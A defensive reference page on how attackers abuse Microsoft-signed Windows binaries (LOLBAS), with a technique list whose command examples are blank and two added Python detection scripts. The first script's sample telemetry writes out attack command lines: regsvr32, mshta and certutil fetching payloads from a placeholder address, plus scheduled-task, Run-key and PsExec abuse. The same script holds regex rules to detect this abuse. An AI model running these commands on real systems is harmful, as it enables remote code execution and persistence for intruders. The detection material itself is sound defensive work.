EoP - Living Off The Land Binaries and Scripts
Living Off The Land Binaries and Scripts (LOLBAS) in Elevation of Privilege (EoP)
Overview
Living Off The Land Binaries and Scripts (LOLBAS) refer to the use of legitimate Microsoft-signed binaries, scripts, and libraries to perform unintended, powerful actions. These tools, collectively referred to as LOLBins, LOLScripts, and LOLLibs, can bypass traditional security measures, facilitate privilege escalation, and maintain persistence without relying on external malware.
Purpose of LOLBAS in Attacks
Attackers exploit LOLBAS to:
Evade detection by blending malicious activities with legitimate system processes.
Bypass security mechanisms such as application whitelisting and antivirus.
Persist on compromised systems using trusted tools to avoid raising alarms.
Criteria for LOLBin, LOLScript, and LOLLib Entries
Microsoft-Signed: Must be signed by Microsoft and either pre-installed or available through official Microsoft channels.
Unexpected Functionality: Provides capabilities beyond its documented purpose.
APT Relevance: Demonstrates value to Advanced Persistent Threat (APT) groups, red teams, or penetration testers.
Common Techniques and Examples
1. Process Execution Using wmic.exe
Description: Executes processes and manages system configurations via Windows Management Instrumentation (WMI).
Command Example:
Purpose: Executes calc.exe or other binaries stealthily, avoiding the need to drop new binaries.
Security Implication: Avoids detection by security systems that monitor new file execution.
2. Remote Code Execution with regsvr32.exe
Description: Designed for COM object registration, but can load and execute remote scripts.
Command Example:
Purpose: Executes remote code by loading scripts, bypassing download restrictions.
Security Implication: Bypasses application control and runs code via a trusted binary.
3. File Compilation Using Microsoft.Workflow.Compiler.exe
Description: Compiles workflows but can be used to process and execute unintended payloads.
Command Example:
Purpose: Leverages malicious XML to trigger code execution.
Security Implication: A stealthy approach for executing unauthorized workflows.
4. PowerShell Execution via mshta.exe
Description: Executes HTML applications but can run PowerShell commands through JavaScript.
Command Example:
Purpose: Executes PowerShell commands within a JavaScript payload.
Security Implication: Avoids detection by running malicious scripts through a trusted binary.
5. DLL Execution with rundll32.exe
Description: Loads and executes DLLs, often used for fileless attacks.
Command Example:
Purpose: Executes code entirely in memory, evading traditional antivirus.
Security Implication: Bypasses executable monitoring while maintaining stealth.
6. Scheduled Tasks via schtasks.exe
Description: Creates tasks to execute commands or scripts at specific times or system events.
Command Example:
Purpose: Establishes persistence through scheduled execution.
Security Implication: Stealthy task scheduling to evade detection.
7. File Downloads Using certutil.exe
Description: Primarily for certificate management, but capable of downloading files.
Command Example:
Purpose: Downloads malicious files while appearing as legitimate network activity.
Security Implication: Evades detection by using a trusted binary for data transfer.
8. Code Execution with InstallUtil.exe
Description: Part of the .NET Framework; executes .NET assemblies.
Command Example:
Purpose: Executes custom .NET code for stealthy payload delivery.
Security Implication: Avoids detection by running custom assemblies through a trusted binary.
9. Registry Persistence via reg.exe
Description: Modifies registry keys to execute commands or scripts during system startup.
Command Example:
Purpose: Ensures persistence by running malicious files at user login.
Security Implication: Registry-based persistence often goes unnoticed by security systems.
10. Lateral Movement with PsExec.exe
Description: Executes processes on remote systems.
Command Example:
Purpose: Facilitates lateral movement by running commands on remote systems.
Security Implication: If PsExec is allowed, it provides attackers easy lateral movement.
Defensive Strategies Against LOLBAS Techniques
1. Enhanced Logging and Monitoring
Use Sysmon or similar tools to log process creation, command-line arguments, and network activity.
Monitor execution of known LOLBins, especially with unusual parameters.
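The following is an added example, not code from the original page or from the LOLBAS project, showing what "monitor execution of known LOLBins with unusual parameters" looks like in practice for the ten binaries described in the techniques section above. It runs simple command-line rules over constructed Sysmon Event ID 1 (process creation) records; the rule patterns, host names, user names, file paths and the 203.0.113.5 address are all assumptions of this example, and the patterns are deliberately narrowed to the abuse case so that routine administrative use of the same binaries does not alert.

```python
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]


def ev(host: str, user: str, image: str, cmdline: str) -> Event:
    """Build a reduced Sysmon Event ID 1 record (only the fields the rules use)."""
    return {"host": host, "user": user, "image": image, "cmdline": cmdline}


# Constructed sample telemetry (not real logs): one abuse case per binary
# discussed on the page, then three routine administrative uses that must
# not alert. Hosts, users, paths and the address are placeholders.
TMP = r"C:\Users\alice\AppData\Local\Temp"
SAMPLE_EVENTS: List[Event] = [
    ev("WS01", r"CORP\alice", r"C:\Windows\System32\wbem\WMIC.exe",
       r'wmic process call create "calc.exe"'),
    ev("WS01", r"CORP\alice", r"C:\Windows\System32\regsvr32.exe",
       r"regsvr32 /s /u /i:http://203.0.113.5/file.sct scrobj.dll"),
    ev("WS01", r"CORP\alice", r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe",
       TMP + r"\run.xml " + TMP + r"\result.txt"),
    ev("WS01", r"CORP\alice", r"C:\Windows\System32\mshta.exe",
       r"mshta.exe http://203.0.113.5/page.hta"),
    ev("WS01", r"CORP\alice", r"C:\Windows\System32\rundll32.exe",
       r'rundll32.exe javascript:"<constructed placeholder>"'),
    ev("WS01", r"CORP\alice", r"C:\Windows\System32\schtasks.exe",
       r"schtasks /create /tn Updater /tr " + TMP + r"\u.exe /sc onlogon"),
    ev("WS01", r"CORP\alice", r"C:\Windows\System32\certutil.exe",
       r"certutil -urlcache -split -f http://203.0.113.5/p.bin " + TMP + r"\p.bin"),
    ev("WS01", r"CORP\alice", r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
       r"InstallUtil.exe /logfile= /LogToConsole=false /U " + TMP + r"\a.dll"),
    ev("WS01", r"CORP\alice", r"C:\Windows\System32\reg.exe",
       r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d " + TMP + r"\u.exe"),
    ev("WS01", r"CORP\alice", r"C:\Tools\PsExec.exe",
       r"psexec \\SRV01 -s cmd.exe"),
    # Benign administrative activity: same binaries, expected parameters.
    ev("SRV01", r"CORP\svc_admin", r"C:\Windows\System32\certutil.exe",
       r"certutil -hashfile C:\Tools\setup.exe SHA256"),
    ev("SRV01", r"CORP\svc_admin", r"C:\Windows\System32\wbem\WMIC.exe",
       r"wmic os get caption"),
    ev("SRV01", r"CORP\svc_admin", r"C:\Windows\System32\reg.exe",
       r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"),
]

# Detection rules: (name, Image-path pattern, CommandLine pattern). A rule fires
# only when both match, so the command-line pattern carries the "unusual
# parameter" part. These patterns are an assumption of this example.
RULES: List[Tuple[str, str, str]] = [
    ("wmic_process_create",       r"wmic\.exe$",                          r"process\s+call\s+create"),
    ("regsvr32_remote_scriptlet", r"regsvr32\.exe$",                      r"/i:\s*https?://|scrobj\.dll"),
    ("workflow_compiler_run",     r"microsoft\.workflow\.compiler\.exe$", r"."),   # any use is rare
    ("mshta_inline_script",       r"mshta\.exe$",                         r"(javascript|vbscript):|https?://"),
    ("rundll32_inline_script",    r"rundll32\.exe$",                      r"(javascript|vbscript):"),
    ("schtasks_create",           r"schtasks\.exe$",                      r"/create\b"),
    ("certutil_download",         r"certutil\.exe$",                      r"-?urlcache|https?://"),
    ("installutil_uninstall",     r"installutil\.exe$",                   r"/u\b"),
    ("reg_run_key_persistence",   r"reg\.exe$",                           r"\badd\b.*currentversion\\run"),
    ("psexec_remote_exec",        r"psexec(64)?\.exe$",                   r"."),   # any use is notable
]
COMPILED = [(n, re.compile(i, re.I), re.compile(c, re.I)) for n, i, c in RULES]


def evaluate(event: Event) -> List[str]:
    """Return the names of every rule the event matches (empty list if benign)."""
    return [name for name, img_re, cmd_re in COMPILED
            if img_re.search(event["image"]) and cmd_re.search(event["cmdline"])]


def scan(events: List[Event]) -> List[Tuple[str, str, str]]:
    """Run all rules over all events and return (host, user, rule) findings."""
    return [(e["host"], e["user"], rule) for e in events for rule in evaluate(e)]


if __name__ == "__main__":
    for host, user, rule in scan(SAMPLE_EVENTS):
        print(f"{host:6} {user:16} {rule}")
```

In production the records would come from a SIEM query over Sysmon Event ID 1 (or Windows Security 4688 with command-line auditing enabled); the rules are intentionally coarse and should be tuned against each environment's own baseline before being used to page anyone.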
2. Application Control Policies
Implement AppLocker or Windows Defender Application Control (WDAC) to restrict usage of high-risk LOLBins.
Allow only pre-approved executables based on organizational requirements.
3. Binary and Script Restrictions
Remove or disable unneeded binaries such as bitsadmin.exe, certutil.exe, and mshta.exe.
Enforce script execution policies for PowerShell and other scripting environments.
4. Regular System Audits
Periodically audit installed binaries and scripts to ensure integrity.
Identify and remove unauthorized or outdated binaries.
5. Threat Hunting and Baseline Analysis
Establish activity baselines for LOLBin usage and detect deviations.
Proactively search for unusual command-line patterns or scheduled tasks.
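As an added example (not code from the original page), the block below implements the baseline step described in this section: it averages per-host, per-user daily executions of each LOLBin over a historical window and then flags two kinds of deviation on a new day's telemetry, a binary never seen before for that host/user pair, and a known binary whose daily count jumps well above its baseline. The seven-day history, host names, user names and thresholds are constructed assumptions of the example.

```python
from collections import Counter, defaultdict
from typing import Dict, List, Tuple

Key = Tuple[str, str]          # (host, user)
NEVER_SEEN = "never seen in baseline"


def rec(host: str, user: str, binary: str) -> dict:
    """One process-creation record reduced to the fields the baseline uses."""
    return {"host": host, "user": user, "binary": binary}


# Constructed seven-day history (not real telemetry): an admin service account
# that routinely uses certutil, reg and schtasks, and a workstation user who
# runs wmic once a day.
BASELINE_DAYS = 7
BASELINE: List[dict] = (
    [rec("SRV01", r"CORP\svc_admin", "certutil.exe")] * 14   # 2/day
    + [rec("SRV01", r"CORP\svc_admin", "reg.exe")] * 7       # 1/day
    + [rec("SRV01", r"CORP\svc_admin", "schtasks.exe")] * 7  # 1/day
    + [rec("WS01", r"CORP\alice", "wmic.exe")] * 7           # 1/day
)

# Constructed "today": the admin's certutil use spikes, alice runs mshta for
# the first time, and a host with no history at all runs rundll32.
TODAY: List[dict] = (
    [rec("SRV01", r"CORP\svc_admin", "certutil.exe")] * 9
    + [rec("SRV01", r"CORP\svc_admin", "reg.exe")] * 2
    + [rec("WS01", r"CORP\alice", "wmic.exe")]
    + [rec("WS01", r"CORP\alice", "mshta.exe")]
    + [rec("WS02", r"CORP\bob", "rundll32.exe")]
)


def _count(events: List[dict]) -> Dict[Key, Counter]:
    """Count executions of each binary per (host, user)."""
    counts: Dict[Key, Counter] = defaultdict(Counter)
    for e in events:
        counts[(e["host"], e["user"])][e["binary"].lower()] += 1
    return counts


def build_baseline(events: List[dict], days: int) -> Dict[Key, Dict[str, float]]:
    """Average daily executions of each LOLBin per (host, user) over `days` days."""
    return {key: {b: n / days for b, n in c.items()} for key, c in _count(events).items()}


def detect_deviations(baseline: Dict[Key, Dict[str, float]], todays_events: List[dict],
                      factor: float = 3.0, min_count: int = 3) -> List[Tuple[str, str, str, str]]:
    """Flag (host, user, binary, reason) where today's use is new or far above baseline.

    `factor` is the multiple of the baseline daily average that counts as a spike;
    `min_count` stops a single extra execution of a rarely used tool from alerting.
    """
    findings = []
    for key, todays in _count(todays_events).items():
        known = baseline.get(key, {})
        for binary, n in todays.items():
            if binary not in known:
                findings.append((key[0], key[1], binary, NEVER_SEEN))
            elif n >= min_count and n > factor * known[binary]:
                findings.append((key[0], key[1], binary,
                                 f"{n} today vs {known[binary]:.1f}/day baseline"))
    return findings


if __name__ == "__main__":
    for host, user, binary, reason in detect_deviations(build_baseline(BASELINE, BASELINE_DAYS), TODAY):
        print(f"{host:6} {user:16} {binary:14} {reason}")
```

A "never seen" hit is the stronger signal for threat hunting, since LOLBin abuse typically shows up as a trusted binary appearing on a host or under an account where it has no business; the volume rule catches the quieter case of an already-present tool being used far more than usual.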
Conclusion
The abuse of LOLBAS techniques presents a significant challenge in modern cybersecurity, allowing attackers to evade traditional defenses by leveraging trusted binaries. By understanding these methods and implementing robust defensive strategies, organizations can enhance their detection and mitigation capabilities against these stealthy attack vectors.